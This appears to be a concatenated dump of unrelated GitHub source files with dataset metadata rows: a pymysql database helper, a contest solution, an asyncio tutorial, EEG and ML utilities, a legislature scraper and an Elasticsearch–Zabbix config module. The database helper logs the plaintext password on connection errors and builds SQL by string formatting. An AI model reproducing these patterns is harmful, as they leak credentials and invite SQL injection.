logging.error( "DBTool.py: connect: FATAL_ERROR: 创建数据库连接失败[%s],请检查数据库配置以及数据库可用性。数据库信息:Host:[%s] Port:[%s] User:[%s] Pass:[%s]" %(e,self.__host,self.__port,self.__username,self.__password))
return False
def release(self):
if self.__open:
try:
self.__conn.close()
except Exception as e:
logging.error(traceback.format_exc())
finally:
self.__open = False
# if self.__open == False:
# logging.debug( u"DBTool.py: release: 数据库连接连接断开。")
def flush(self):
self.release()
self.connect()
def execute_sql(self, sql,auto_release = False):
"""执行sql语句
:param sql: excel传入的sql.
:return: 返回成功失败,只有所有的都成功才返回成功
"""
try:
self.connect()
# logging.debug ("DBTool.py: execute_sql: 执行SQL:%s " % sql)
if self.__isDictCursor:
cursor = self.__conn.cursor(pymysql.cursors.DictCursor)
else:
cursor = self.__conn.cursor()
cursor.execute('SET NAMES utf8;')
cursor.execute('SET CHARACTER SET utf8;')
cursor.execute('SET character_set_connection=utf8;')
cursor.execute(sql)
self.__conn.commit()
data = cursor.fetchall()
# 关闭数据库连接
return data
except Exception as e:
logging.error(traceback.format_exc())
logging.debug( "DBTool.py: execute_sql : 发生异常:%s, 异常类型%s." % (e,type(e)))
return False
finally:
if auto_release:
self.release()
def execute_update_sql(self, sql, auto_release = False):
"""执行sql语句
:param sql: excel传入的sql.
:return: 返回成功失败,只有所有的都成功才返回成功
"""
try:
self.connect()
# logging.debug ("DBTool.py: execute_sql: 执行SQL:%s " % sql)
if self.__isDictCursor:
cursor = self.__conn.cursor(pymysql.cursors.DictCursor)
else:
cursor = self.__conn.cursor()
cursor.execute('SET NAMES utf8;')
cursor.execute('SET CHARACTER SET utf8;')
cursor.execute('SET character_set_connection=utf8;')
res = cursor.execute(sql)
self.__conn.commit()
# 关闭数据库连接
return res
except Exception as e:
logging.error(traceback.format_exc())
print(traceback.format_exc())
logging.debug( "DBTool.py: execute_sql : 发生异常:%s, 异常类型%s." % (e,type(e)))
return False
finally:
if auto_release:
self.release()
def get_effected_rows_count(self, sql, auto_release = False):
"""执行sql语句
:param sql: excel传入的sql.
:return: 返回成功失败,只有所有的都成功才返回成功
"""
sql = sql.strip()
sql_lower = sql.lower()
try:
self.connect()
cursor = self.__conn.cursor()
cursor.execute('SET NAMES utf8;')
cursor.execute('SET CHARACTER SET utf8;')
cursor.execute('SET character_set_connection=utf8;')
curd_judge_string = sql_lower[0:6]
#logging.debug(u"DBTool.py:get_effected_rows_count:curd_judge_string:[%s]" % curd_judge_string)
if curd_judge_string == "select":
#logging.debug(u"DBTool.py:get_effected_rows_count:INTO select.")
cursor.execute(sql)
#logging.debug(u"DBTool.py:get_effected_rows_count: SELECT影响行数:%d" % cursor.rowcount)
return cursor.rowcount
elif curd_judge_string == 'update':
sql_lower = sql.lower().strip()
where_loc = sql_lower.find('where')
set_loc = sql_lower.find('set')
table_name = sql[6:set_loc].strip()
where_str = sql[where_loc + 5:].strip()
if where_loc == -1:
return ServiceConf.sql_effect_lines+1
new_sql = "select * from %s where %s" % (table_name, where_str)
cursor.execute(new_sql)
return cursor.rowcount
elif curd_judge_string == 'delete':
# delete from tablename where where cb = 2 to select * from tablename where xxxxxx
sql_lower = sql.lower().strip()
from_loc = sql_lower.find('from')
where_loc = sql_lower.find('where')
table_name = sql[from_loc + 4:where_loc == -1 and len(sql) or where_loc + 1]
where_str = sql[where_loc + 5:].strip()
if where_loc == -1:
return ServiceConf.sql_effect_lines+1
new_sql = "select * from %s where %s" % (table_name, where_str)
cursor.execute(new_sql)
return cursor.rowcount
elif curd_judge_string == 'insert':
return 1
else:
return -1
# 关闭数据库连接
except Exception as e:
logging.error(traceback.format_exc())
return -1
finally:
if auto_release:
self.release()
if __name__ == "__main__":
pass
| LianjiaTech/sosotest | AutotestFramework/core/tools/DBTool.py | DBTool.py | py | 8,233 | python | en | code | 489 | github-code | 90 |
17981062729 | # -*- coding: utf-8 -*-
import sys
from collections import deque, defaultdict
from math import sqrt, factorial, gcd
# def input(): return sys.stdin.readline()[:-1] # warning not \n
# def input(): return sys.stdin.buffer.readline().strip() # warning bytes
# def input(): return sys.stdin.buffer.readline().decode('utf-8')
def solve():
n = int(input())
a = [int(x) for x in input().split()]
b = deque()
for i in range(n):
if i % 2:
b.appendleft(a[i])
else:
b.append(a[i])
if n % 2:
b.reverse()
print(*b)
t = 1
# t = int(input())
for case in range(1,t+1):
ans = solve()
"""
abc
"""
| Aasthaengg/IBMdataset | Python_codes/p03673/s086382115.py | s086382115.py | py | 663 | python | en | code | 0 | github-code | 90 |
32057996662 | # 3个要点 时间循环 + 回调(驱动生成器) + epoll(IO多路复用)
# asyncio是Python用于解决异步IO编程的一整套解决方案
# Tornado,gevent,Twisted(Scrapy, django channels)
# 使用asyncio
# 使用协程,必须搭配 事件循环才能使用
import time
import asyncio
# 处理回调函数传参问题
from functools import partial
async def get_url(url):
print(f'start url:{url}')
# time.sleep(2)
# 在耗时操作中,需要加上await
# 主要是在模拟耗时操作
await asyncio.sleep(2)
print(f'end url: {url}')
return url
def callback(future):
print('send email xiaowei')
def callback_params(url, future):
print('hello world', url)
if __name__ == '__main__':
start_time = time.time()
# 获取asyncio 事件循环
loop = asyncio.get_event_loop()
# 阻塞方法,等待函数执行完成,才会执行下一步, 此次是提交单个任务
# loop.run_until_complete(get_url('https://www.baidu.com'))
# 提交多个任务
# tasks = [get_url(f'https://www.baidu.com/{i}') for i in range(10)]
# loop.run_until_complete(asyncio.wait(tasks))
# 获取任务的返回值
# get_future = loop.create_task(get_url(f'https://www.baidu.com/{1}'))
# 或者
get_future = asyncio.ensure_future(get_url(f'https://www.baidu.com/{1}'))
# 给任务添加回调功能
get_future.add_done_callback(callback)
# 如果回调函数中 需要 传参数怎么办
get_future.add_done_callback(partial(callback_params, 'xiaoweigege'))
# 将任务注册到loop中去
loop.run_until_complete(get_future)
return_url = get_future.result()
print('获取结果', return_url)
end_time = time.time()
print(f'总共耗时:{end_time-start_time}') | xiaoweigege/Python_senior | chapter12/1. loop.py | 1. loop.py | py | 1,783 | python | zh | code | 1 | github-code | 90 |
70668810856 | #!/usr/bin/env python3
import torch
def make_embedder(
architecture: str='GPT',
training_style: str='CSM',
in_dim: int=1024,
embed_dim: int=768,
num_hidden_layers: int=1,
masking_rate: float=0.2,
dropout: float=0.1,
t_r_precision: float = 0.2, # in seconds
max_t_r: float = 300, # in seconds (= 10min)
n_positions: int=512
) -> torch.nn.Module:
"""
Make an embedder object.
The embedder is used to prepare an input batch
(as generated by src.batcher) for training and
compute the model's training loss, given the
specified training style.
Args:
-----
architecture: str
The model architecture to use.
One of: 'GPT', 'BERT', 'NetBERT', autoencoder',
'PretrainedGPT', 'PretrainedBERT', 'LinearBaseline'.
training_style: str
The used training style (ie., framework).
One of: 'BERT', 'CSM', 'NetBERT', 'autoencoder',
'decoding'.
in_dim: int
The input dimension (ie., # networks) of the
parcelated BOLD data.
embed_dim: int
The dimension of the used embedding space.
num_hidden_layers: int
The number of hidden layers of the embedding
model. If more than one layers are used, all
layers except the last one are activated through
Gelu activation (see src.base.EmbeddingModel).
masking_rate: float
Masking rate used for BERT-style models.
dropout: float
Dropout rate used emebdding model.
t_r_precision: float
The precision of the repetition time (ie., TR)
embedding (in seconds).
max_t_r: float
The maximum repetition time (in seconds) that
the model can handle (in seconds).
n_positions: int
The maximum number of sequence elements that
the model can handle (in sequence elements).
Core methods:
-----
prep_batch(batch):
Makes all training-style specific edits of input batch
(as generated by src.batcher);
i.e., projection of input BOLD sequences into an
embedding space (as defined by embed_dim)
and addition of all training-style specific tokens to
the input data
loss(batch, outputs):
Compute the training-style specific loss,
given batch (as generated by prep_batch) and
the the full model's (see src.model) output
(as generated by model.forward)
switch_decoding_mode(is_decoding_mode):
Switch the embedder to decoding mode (is_decoding_mode=True).
This function is needed to adapt a pre-trained model
to a downstream decoding task.
"""
kwargs = {
"in_dim": in_dim,
"embed_dim": embed_dim,
"num_hidden_layers": num_hidden_layers,
"masking_rate": masking_rate,
"dropout": dropout,
"t_r_precision": t_r_precision,
"max_t_r": max_t_r,
"n_positions": n_positions
}
if training_style == 'autoencoder':
from src.embedder.autoen import AutoenEmbedder
embedder = AutoenEmbedder(**kwargs)
elif training_style == 'CSM':
from src.embedder.csm import CSMEmbedder
embedder = CSMEmbedder(**kwargs)
elif training_style == 'MSM':
from src.embedder.msm import MSMEmbedder
embedder = MSMEmbedder(**kwargs)
elif training_style == 'MNM':
from src.embedder.mnm import MNMEmbedder
embedder = MNMEmbedder(**kwargs)
elif training_style == 'BERT':
from src.embedder.bert import BERTEmbedder
embedder = BERTEmbedder(**kwargs)
elif training_style == 'NetBERT':
from src.embedder.netbert import NetBERTEmbedder
embedder = NetBERTEmbedder(**kwargs)
elif training_style == 'decoding':
if architecture == 'autoencoder':
from src.embedder.autoen import AutoenEmbedder
embedder = AutoenEmbedder(**kwargs)
elif architecture in {'GPT', 'PretrainedGPT2'}:
from src.embedder.csm import CSMEmbedder
embedder = CSMEmbedder(**kwargs)
elif architecture in {
'BERT',
'PretrainedBERT',
'PretrainedDistilBERT',
'PretrainedRoBERTa'
}:
from src.embedder.bert import BERTEmbedder
embedder = BERTEmbedder(**kwargs)
elif architecture == 'NetBERT':
from src.embedder.netbert import NetBERTEmbedder
embedder = NetBERTEmbedder(**kwargs)
elif architecture == 'LinearBaseline':
from src.embedder.dummy import DummyEmbedder
embedder = DummyEmbedder(**kwargs)
else:
raise ValueError('unkown architecture')
else:
raise ValueError('unknown training style.')
return embedder | athms/learning-from-brains | src/embedder/make.py | make.py | py | 4,842 | python | en | code | 50 | github-code | 90 |
18814521417 | import pytz
import dateutil.parser
import datetime
import re
from utils import LXMLMixin
from openstates.scrape import Scraper, Event
from openstates.exceptions import EmptyScrape
# http://mgaleg.maryland.gov/mgawebsite/Meetings/Day/0128202102282021?budget=show&cmte=allcommittees&updates=show&ys=2021rs
class MDEventScraper(Scraper, LXMLMixin):
_tz = pytz.timezone("US/Eastern")
chambers = {"upper": "Senate", "lower": ""}
date_format = "%m%d%Y"
bill_hear_re = re.compile(r"(.+)( - Bill Hearing)")
def scrape(self, session=None, start=None, end=None):
if start is None:
start_date = datetime.datetime.now().strftime(self.date_format)
else:
start_date = datetime.datetime.strptime(start, "%Y-%m-%d")
start_date = start_date.strftime(self.date_format)
# default to 60 days if no end
if end is None:
dtdelta = datetime.timedelta(days=60)
end_date = datetime.datetime.now() + dtdelta
end_date = end_date.strftime(self.date_format)
else:
end_date = datetime.datetime.strptime(end, "%Y-%m-%d")
end_date = end_date.strftime(self.date_format)
# regular gets an RS at the end, special gets nothing because s1 is in the session
if session[-2] != "s":
session += "rs"
url = "https://mgaleg.maryland.gov/mgawebsite/Meetings/Day/{}{}?budget=show&cmte=allcommittees&updates=show&ys={}"
url = url.format(start_date, end_date, session)
page = self.lxmlize(url)
# if both "<house banner> No Hearings Message" and "<senate banner> No Hearings Message"
empty_chamber = "//div[div/div[contains(@class,'{chamber}')]]/following-sibling::text()[contains(.,'No hearings')]"
if page.xpath(empty_chamber.format(chamber="Senate")) and page.xpath(
empty_chamber.format(chamber="House")
):
raise EmptyScrape
event_count = 0
for row in page.xpath('//div[@id="divAllHearings"]/hr'):
banner = row.xpath(
'preceding-sibling::div[contains(@class,"row")]/div/div[contains(@class,"hearsched-committee-banner")]'
)[-1]
banner_class = banner.xpath("@class")[0]
chamber = ""
if "house" in banner_class:
chamber = "Assembly"
elif "senate" in banner_class:
chamber = "Senate"
meta = row.xpath(
'preceding-sibling::div[contains(@class,"hearsched-hearing-header")]'
)[-1]
data = row.xpath('preceding-sibling::div[contains(@class,"row")]')[-1]
when = meta.xpath(
'.//div[contains(@class,"font-weight-bold text-center")]/text()'
)[0].strip()
com_row = meta.xpath(
'.//div[contains(@class,"font-weight-bold text-center")]/text()'
)[1].strip()
if chamber != "":
com_row = f"{chamber} {com_row}"
# if they strike all the header rows, its cancelled
unstruck_count = len(
meta.xpath(
'.//div[contains(@class,"font-weight-bold text-center") and(not(contains(@class,"hearsched-strike")))]'
)
)
if unstruck_count == 0:
self.info(f"Skipping {com_row} {when} -- it appears cancelled")
continue
# find the first unstruck time row
time_loc = meta.xpath(
'.//div[contains(@class,"font-weight-bold text-center")'
'and(contains(text(),"AM") or contains(text(),"PM")) and(not(contains(@class,"hearsched-strike")))]/text()'
)[0].strip()
if "-" in time_loc:
time = time_loc.split("-")[0].strip()
where = time_loc.split("-")[1].strip()
else:
time = time_loc
where = "See Committee Site"
if com_row == "":
continue
bill_hearing_format = self.bill_hear_re.search(com_row)
if bill_hearing_format:
com_row = bill_hearing_format.groups()[0]
# remove end dates
when = re.sub(r"to \d+:\d+\s*\w+", "", f"{when} {time}").strip()
when = dateutil.parser.parse(when)
when = self._tz.localize(when)
event = Event(
name=com_row,
location_name=where,
start_date=when,
classification="committee-meeting",
)
com_name = re.sub(r"[\s\-]*Work Session", "", com_row)
if com_name:
event.add_participant(name=com_name, type="committee", note="host")
event.add_source("https://mgaleg.maryland.gov/mgawebsite/Meetings/Week/")
for agenda_row in data.xpath(
"div/div/div[contains(@class,'hearsched-table')]"
):
children = agenda_row.xpath("div")
# bill row
if len(children) == 4:
if agenda_row.xpath("div[1]/a"):
agenda = event.add_agenda_item(
agenda_row.xpath("div[4]/text()")[0].strip()
)
bill_num = agenda_row.xpath("div[1]/a/text()")[0].strip()
agenda.add_bill(bill_num)
elif len(children) == 1:
agenda = event.add_agenda_item(
agenda_row.xpath("div[1]")[0].text_content().strip()
)
event_count += 1
yield event
if event_count < 1:
raise EmptyScrape
| openstates/openstates-scrapers | scrapers/md/events.py | events.py | py | 5,751 | python | en | code | 820 | github-code | 90 |
73626283495 | #-*- coding: utf-8 -*-
import scrapy
from scrapy.spiders import Rule
from scrapy.linkextractors import LinkExtractor
from douban_movie.items import DoubanMovieItem
class AwesomeMovieSpider(scrapy.spiders.CrawlSpider):
name = 'awesome-movie'
allowed_domains = ['movie.douban.com']
start_urls = ['https://movie.douban.com/subject/3011091/']
rules = (
Rule(LinkExtractor(allow='https://movie.douban.com/subject/\d+/\?'),
callback='parse_item', follow=True),
)
def parse_item(self, response):
item = DoubanMovieItem()
item['url'] = response.url
item['name'] = response.xpath(
'//span[@property="v:itemreviewed"]/text()').extract_first().strip()
item['summary'] = response.xpath(
'//span[@property="v:summary"]/text()').extract_first().strip()
item['score'] = response.xpath(
'//strong[@property="v:average"]/text()').extract_first().strip()
return item
def parse_start_url(self, response):
yield self.parse_item(response)
def parse_page(self, response):
yield self.parse_item(response)
| Yao-Phoenix/challenge | challenge20/douban_movie/douban_movie/spiders/awesome_movie.py | awesome_movie.py | py | 1,168 | python | en | code | 0 | github-code | 90 |
22833545574 | """
Configuration specific modules and functions
"""
import logging
from es_client import Builder
from es_client.helpers.schemacheck import SchemaCheck
from es_client.helpers.utils import get_yaml, prune_nones
from es_stats_zabbix.defaults.config import schema
from es_stats_zabbix.defaults.settings import apis
from es_stats_zabbix.exceptions import ConfigurationError
from es_stats_zabbix.helpers.logtools import set_logging
LOGGER = logging.getLogger(__name__)
TOP_LEVEL = ['elasticsearch', 'logging', 'backend', 'zabbix', 'endpoints']
CLIENT_KEYS = [
'host', 'port', 'url_prefix', 'use_ssl', 'ca_certs', 'client_cert', 'client_key',
'verify_certs', 'username', 'password', 'timeout',
]
ELASTICSEARCH_KEYS = ['client', 'master_only']
LOGGING_KEYS = ['loglevel', 'logfile', 'logformat', 'blacklist']
BACKEND_KEYS = ['apihost', 'apiport', 'apidebug', 'cache_timeout']
ZBXKEYMAP = {
'zbx_serveractive': 'ServerActive',
'zbx_serverport': 'ServerPort',
'zbx_logtype': 'LogType',
'zbx_logfile': 'LogFile',
'zbx_debuglevel': 'DebugLevel',
'zbx_timeout': 'Timeout',
'zbx_hostname': 'Hostname',
'zbx_tlsconnect': 'TLSConnect',
'zbx_tlscafile': 'TLSCAFile',
'zbx_tlscertfile': 'TLSCertFile',
'zbx_tlscrlfile': 'TLSCRLFile',
'zbx_tlskeyfile': 'TLSKeyFile',
'zbx_tlsservercertissuer': 'TLSServerCertIssuer',
'zbx_tlsservercertsubject': 'TLSServerCertSubject',
'zbx_tlspskidentity': 'TLSPSKIdentity',
'zbx_tlspskfile': 'TLSPSKFile',
}
def default_config():
"""Provide a default configuration"""
value = {'do_not_discover': {'health': ['status']}}
for k in TOP_LEVEL:
value[k] = {}
return value
def get_client(cfg):
"""
Return an Elasticsearch client object from a configuration dictionary
"""
try:
return Builder(cfg).client
except Exception as err:
msg = 'Failed to connect to Elasticsearch: Exception: {0}'.format(err)
LOGGER.error(msg)
raise ConfigurationError(msg)
def check_schema(cfg, key):
"""
Ensure that the schema passes muster
"""
try:
return SchemaCheck(
{key: prune_nones(cfg[key])},
schema(key),
'{0} Configuration'.format(key.title()),
key
).result()
except Exception as err:
msg = 'Failed to configure {0}: Exception: {1}'.format(key, err)
LOGGER.error(msg)
raise ConfigurationError(msg)
def configure_logging(cfg):
"""
Read logging configuration and initiate logging.
"""
set_logging(check_schema(cfg, 'logging')['logging'])
def get_config(cfg, key):
"""
Wrapper to get schema-validated values from :func:~`es_stats_zabbix.helpers.config.check_schema`
"""
return check_schema(cfg, key)[key]
def config_override(ctx):
"""
Override the settings in the config file with the options provided at the command-line
"""
params = prune_nones(ctx.params)
if 'config' in params:
config_dict = get_yaml(params['config'])
else:
config_dict = default_config()
for toplevel in TOP_LEVEL:
if toplevel == 'elasticsearch':
for k in ELASTICSEARCH_KEYS:
if k == 'master_only':
if k in params:
config_dict[toplevel][k] = params[k]
else:
if not k in config_dict[toplevel]:
config_dict[toplevel][k] = {}
for subk in CLIENT_KEYS:
if subk in params:
# If we supply multiple hosts on the command line, they come as a tuple
if subk == 'host':
if params[subk]:
# This "None" doesn't get pruned, it's an empty tuple
config_dict[toplevel][k]['hosts'] = list(params[subk])
else:
config_dict[toplevel][k][subk] = params[subk]
if toplevel == 'logging':
for k in LOGGING_KEYS:
if k in params:
config_dict[toplevel][k] = params[k]
if toplevel == 'zabbix':
# In order to prevent the elasticsearch and zabbix key names from
# colliding, all zabbix keys were prefaced with 'zbx_'.
# We have to strip the 'zbx_' away again, and remap back to the
# CamelCase versions here.
for k in list(ZBXKEYMAP.keys()):
if k in params:
config_dict[toplevel][ZBXKEYMAP[k]] = params[k]
if toplevel == 'backend':
for k in BACKEND_KEYS:
if k in params:
if k[:3] == 'api':
renamed = k[3:] # Remove 'api' from 'apihost', 'apiport', and 'apidebug'
config_dict[toplevel][renamed] = params[k]
else: # Cover cache_timeout this way
config_dict[toplevel][k] = params[k]
return config_dict
def extract_endpoints(data):
"""
Turn the dictionary of endpoints from the config file into a list of all endpoints.
"""
endpoints = []
for nodetype in data:
for interval in data[nodetype]:
for api in data[nodetype][interval]:
endpoints += (
data[nodetype][interval][api]
)
return endpoints
| untergeek/es_stats_zabbix | es_stats_zabbix/helpers/config.py | config.py | py | 5,472 | python | en | code | 11 | github-code | 90 |
17300960638 | #-*-coding:utf-8-*-
wierzchołki = int(input("podaj liczbę wierzchołków: "))
print("wierzchołki zostały ponumerowane od 0 do %s" %(wierzchołki-1))
macierz = {}
for i in range(wierzchołki):
macierz[i] = []
for k in range(wierzchołki):
if i != k:
if k in macierz.keys():
macierz[i].append(macierz[k][i])
else:
sąsiedztwo = int(input("wpisz 0 lub 1 w zależności czy wierzchołek %s jest połączony z wierzchołkiem %s: " %(i,k)))
macierz[i].append(sąsiedztwo)
else:
macierz[i].append(0)
print("macierz sąsiedztwa: ")
print(macierz)
def stopien_wierzcholkow(dict):
lista = []
for key in dict:
lista.append(sum(dict[key]))
return lista
def stopien_grafu(l):
return max(l)
l = stopien_wierzcholkow(macierz)
print("stopień wierzchołków: ")
print(l)
print("stopień grafu: %d" % stopien_grafu(l))
| JuliaHardy/graphs | grafy_1.py | grafy_1.py | py | 962 | python | pl | code | 0 | github-code | 90 |
20905146452 | import argparse
import json
import re
import string
from paddlenlp.metrics import BLEU
def setup_args():
"""Setup arguments."""
parser = argparse.ArgumentParser()
parser.add_argument("--dataset", type=str, choices=["SMD", "CamRest", "MultiWOZ"], required=True)
parser.add_argument("--pred_file", type=str, required=True)
parser.add_argument("--entity_file", type=str, required=True)
parser.add_argument("--save_file", type=str, required=True)
args = parser.parse_args()
return args
def evaluate(args):
"""Main evaluation function."""
with open(args.pred_file, "r") as fin:
data = json.load(fin)
print(f"Load prediction file from: {args.pred_file}")
preds = []
refs = []
for dial in data:
for turn in dial["dialogue"]:
if turn["turn"] == "system":
if args.dataset == "MultiWOZ":
preds.append(preprocess_text(turn["generated_response"]))
else:
preds.append(turn["generated_response"])
refs.append(turn["utterance"])
assert len(preds) == len(refs), f"{len(preds)} != {len(refs)}"
bleu_metric = BLEUMetric()
entity_metric = EntityMetric(args)
bleu_res = bleu_metric.evaluate(preds, refs)
entity_res = entity_metric.evaluate(preds, refs)
results = {
"BLEU": bleu_res,
"Entity-F1": entity_res
}
print(json.dumps(results, indent=2))
with open(args.save_file, "w") as fout:
json.dump(results, fout, indent=2)
return
class BLEUMetric(object):
"""BLEU Metric for Response."""
def __init__(self):
self.metric = BLEU()
def evaluate(self, preds, refs):
preds, refs = self._process_text(preds, refs)
for pred, ref in zip(preds, refs):
self.metric.add_inst(pred, ref)
bleu = self.metric.score()
return bleu
def _process_text(self, preds, refs):
_preds = [pred.strip().lower().split(" ") for pred in preds]
_refs = [[ref.strip().lower().split(" ")] for ref in refs]
return _preds, _refs
class EntityMetric(object):
"""Entity Metric for Response."""
def __init__(self, args):
self.dataset = args.dataset
self.entities = self._load_entities(args.entity_file)
def evaluate(self, preds, refs):
extracted_preds_entities = []
extracted_refs_entities = []
for pred, ref in zip(preds, refs):
pred_entities = self._extract_entities(pred)
ref_entities = self._extract_entities(ref)
extracted_preds_entities.append(pred_entities)
extracted_refs_entities.append(ref_entities)
entity_f1 = self._compute_entity_f1(extracted_preds_entities, extracted_refs_entities)
return entity_f1
def _load_entities(self, entities_file):
with open(entities_file, "r") as fin:
raw_entities = json.load(fin)
entities = set()
if self.dataset == "SMD":
for slot, values in raw_entities.items():
for val in values:
if slot == "poi":
entities.add(val["address"])
entities.add(val["poi"])
entities.add(val["type"])
elif slot == "distance":
entities.add(f"{val} miles")
elif slot == "temperature":
entities.add(f"{val}f")
else:
entities.add(val)
# add missing entities
missed_entities = ["yoga", "tennis", "swimming", "football", " lab ", "doctor", "optometrist", "dentist",
"1st", "2nd", "3rd", "4th", "5th", "6th", "7th", "8th", "9th", "10th", "11th", "12th",
"13th", "14th", "15th", "16th", "17th", "18th", "19th", "20th", "jill", "jack", " hr "]
for missed_entity in missed_entities:
entities.add(missed_entity)
# special handle of "hr"
entities.remove("hr")
else:
for slot, values in raw_entities.items():
for val in values:
if self.dataset == "MultiWOZ" and slot == "choice":
val = f"choice-{val}"
entities.add(val)
processed_entities = []
for val in entities:
processed_entities.append(val.lower())
processed_entities.sort(key=lambda x: len(x), reverse=True)
return processed_entities
def _extract_entities(self, response):
def _is_sub_str(str_list, sub_str):
for str_item in str_list:
if sub_str in str_item:
return True
return False
response = f" {response} ".lower()
extracted_entities = []
if self.dataset == "SMD":
# preprocess response
for h in range(0, 13):
response = response.replace(f"{h} am", f"{h}am")
response = response.replace(f"{h} pm", f"{h}pm")
for low_temp in [20, 30, 40, 50, 60, 70, 80, 90, 100]:
for high_temp in [20, 30, 40, 50, 60, 70, 80, 90, 100]:
response = response.replace(f"{low_temp}-{high_temp}f", f"{low_temp}f-{high_temp}f")
for entity in self.entities:
if self.dataset == "MultiWOZ":
success_tag = False
if entity.startswith("choice-"):
entity = entity[7:]
if entity == "many":
if entity in re.sub(r"(many (other types|food types|cuisines)|how many)", " ", response):
success_tag = True
elif entity == "all":
if re.search(r"all (of the|expensive|moderate|cheap)", response):
success_tag = True
elif entity == "to":
success_tag = False
else:
if re.search(f"(there are|there is|found|have about|have)( only|) {entity}", response):
success_tag = True
elif entity == "centre":
if entity in response.replace("cambridge towninfo centre", " "):
success_tag = True
elif entity == "free":
if re.search(r"free (parking|internet|wifi)", response):
success_tag = True
elif entity in response or entity.lower() in response.lower():
success_tag = True
if success_tag:
extracted_entities.append(entity)
response = response.replace(entity, " ")
else:
if entity in response and not _is_sub_str(extracted_entities, entity):
extracted_entities.append(entity)
return extracted_entities
def _compute_entity_f1(self, preds, refs):
"""Compute Entity-F1."""
def _count(pred, ref):
tp, fp, fn = 0, 0, 0
if len(ref) != 0:
for g in ref:
if g in pred:
tp += 1
else:
fn += 1
for p in set(pred):
if p not in ref:
fp += 1
return tp, fp, fn
tp_all, fp_all, fn_all = 0, 0, 0
for pred, ref in zip(preds, refs):
tp, fp, fn = _count(pred, ref)
tp_all += tp
fp_all += fp
fn_all += fn
precision = tp_all / float(tp_all + fp_all) if (tp_all + fp_all) != 0 else 0
recall = tp_all / float(tp_all + fn_all) if (tp_all + fn_all) != 0 else 0
f1 = 2 * precision * recall / float(precision + recall) if (precision + recall) != 0 else 0
return f1
def preprocess_text(text):
"""Preprocess utterance and table value."""
text = text.strip().replace("\t", " ").lower()
for p in string.punctuation:
text = text.replace(p, f" {p} ")
text = " ".join(text.split())
return text
if __name__ == "__main__":
args = setup_args()
evaluate(args)
| PaddlePaddle/Research | NLP/EMNLP2022-Q-TOD/evaluate.py | evaluate.py | py | 8,283 | python | en | code | 1,671 | github-code | 90 |
23530212542 | #!/usr/bin/env python3
import os
import sys
import glob
import argparse
import logging
import coloredlogs
import datetime
import numpy as np
from matplotlib import pyplot as plt
import mne
# Baseline to the average of the section from the start of the epoch to the event
BASELINE = (None, 0.1)
# Expected number of samples in a decimated statistics file
EXPECTED_SAMPLES = 2731
timestamp = datetime.datetime.now().isoformat()
parser = argparse.ArgumentParser(description='Automate FMed study grand averaging of MMN.')
parser.add_argument('-v', '--verbose', action='count', default=0)
parser.add_argument('-n', '--name', default=timestamp.replace(":","."))
parser.add_argument('--debug', action="store_true")
parser.add_argument('subject', nargs='+')
args = parser.parse_args()
if args.verbose > 0:
coloredlogs.install(level='DEBUG')
else:
coloredlogs.install(level='INFO')
INPUT_DIR = "/study/thukdam/analyses/eeg_statistics/mmn"
OUTPUT_DIR = f"/scratch/dfitch/plots/{args.name}"
os.makedirs(OUTPUT_DIR, exist_ok=True)
GOOD_TIMES = None
with open(f"{OUTPUT_DIR}/README.txt", 'w') as f:
f.write(' '.join(sys.argv) + "\n\n")
f.write(f"Generated on {timestamp} and written to {args.name} from the following subjects:\n")
for item in args.subject:
f.write("%s\n" % item)
logging.info(f"Reading {args.subject} from {INPUT_DIR} and writing to {OUTPUT_DIR}")
def read_evokeds(f):
global GOOD_TIMES
es = mne.read_evokeds(f, baseline=BASELINE)
if es[0].data.shape[1] != EXPECTED_SAMPLES:
"""
Now, we're expecting a certain sample rate so that we end up with 2731 samples from these arrays.
But we have old cruddy data that has been decimated differently.
So we resample and force the timepoints to be identical (there's a little jitter)
So far we only hit one file, so I am being a bad person and hard coding a resampling rate
that will get files like that one to match. If this does NOT fix future files, we'll have
to figure out how to get at the sample rate of the MNE Evoked lists, and do it dynamically.
Couldn't find it in a few hours of poking.
"""
logging.warning(f"Resampling on {f}, did not get expected decimated statistics length {EXPECTED_SAMPLES}")
es[0].resample(5441)
es[0].times = GOOD_TIMES
else:
GOOD_TIMES = es[0].times
return es
total = []
standard = []
deviant = []
for sid in args.subject:
# Find the statistics files for this subject
def find_file(kind):
path = f"{INPUT_DIR}/{sid}/*{kind}-ave.fif"
find = glob.glob(path)
if len(find) == 0:
logging.fatal(f"No {kind} summary file found for {sid}")
sys.exit(1)
return find[0]
total_file = find_file("all")
standard_file = find_file("standard")
deviant_file = find_file("deviant")
total += read_evokeds(total_file)
standard += read_evokeds(standard_file)
deviant += read_evokeds(deviant_file)
if args.debug:
from IPython import embed; embed()
all_average = mne.combine_evoked(total, weights='nave')
standard_average = mne.combine_evoked(standard, weights='nave')
deviant_average = mne.combine_evoked(deviant, weights='nave')
difference_average = mne.combine_evoked([deviant_average, -standard_average], weights='equal')
logging.info(f"Read {args.subject} from {INPUT_DIR}, creating plots in {OUTPUT_DIR}")
evoked = dict()
evoked["Standard"] = standard_average
evoked["Deviant"] = deviant_average
evoked["Difference"] = difference_average
colors = dict(Standard="Green", Deviant="Red", Difference="Black")
def plot_dms(electrode, scale=2.5, auto=False):
if electrode is None:
pick = "all"
electrode = "all"
else:
pick = standard_average.ch_names.index(electrode)
fig, ax = plt.subplots(figsize=(4, 8/3))
kwargs = dict(axes=ax, picks=pick,
truncate_yaxis=False,
truncate_xaxis=False,
colors=colors,
split_legend=True,
legend='lower right',
show_sensors=False,
ci=0.95,
show=False)
if pick == "all":
# Default is gfp (global field power), let's use mean plz
kwargs['combine'] = 'mean'
if auto:
name = "auto"
mne.viz.plot_compare_evokeds(evoked, **kwargs)
else:
name = str(scale)
mne.viz.plot_compare_evokeds(evoked, ylim=dict(eeg=[-1 * scale, scale]), **kwargs)
filename = f"{OUTPUT_DIR}/{args.name}_{name}_{electrode}.png"
fig.savefig(filename, dpi=300, bbox_inches="tight")
logging.info(f"Plot for mmn grand average on {electrode} saved to {filename}")
plot_dms("Cz", 6.0)
plot_dms("Fz", 6.0)
plot_dms("Pz", 6.0)
plot_dms("T8", 6.0)
| uwmadison-chm/paper-fin-lott-2020 | mmn_grand_average.py | mmn_grand_average.py | py | 4,769 | python | en | code | 0 | github-code | 90 |
18776051797 | # This is the main file for reading CSV data and performing normalization operations
import pandas as pd
import csv
import normalization_procedures
import input_parser
from sql_table_creator import generate_1nf, generate_2nf_3nf, generate_bcnf_4nf_5nf
# Reading the input csv file and the dependencies text file
input_file = pd.read_csv('/content/exampleInputTable.csv')
print('Input Relation Tables:')
print(input_file)
print('\n')
